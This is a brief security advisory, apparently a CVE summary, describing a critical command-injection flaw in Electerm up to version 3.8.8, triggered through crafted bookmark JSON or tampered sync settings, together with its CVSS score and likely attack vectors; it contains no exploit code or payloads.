Electerm, an open‑source terminal and remote‑access client, contains a flaw that allows an attacker to cause the client to execute arbitrary commands by injecting specially crafted fields into imported bookmark JSON files or into global configuration values that are applied when a sync target is refreshed. The flaw is identified as a persistent local‑pty code execution vulnerability. When a bookmark is opened or a sync operation is applied, the injected exec* fields or modified global settings are processed and executed with the privileges of the user running Electerm, effectively granting the attacker remote code execution on the local machine.

All Electerm product releases at or below version 3.8.8 are vulnerable. The issue manifests when users import bookmark files or enable Electerm sync (e.g., gist or WebDAV). The flaw exists across internal bookmark handling, regardless of the specific transport used to synchronize data.

This vulnerability receives a CVSS score of 9.4, indicating a critical impact. No EPSS score is available, and the vulnerability is not listed in the CISA KEV catalog. The likely attack vector requires an attacker to supply a malicious bookmark file or to compromise a sync target such as a gist or WebDAV server. Upon delivery, opening the bookmark or triggering a sync refresh will execute arbitrary code with the local user's privileges, thereby providing full control over the affected system. Social engineering or compromised remote sync repositories are the primary means of deployment.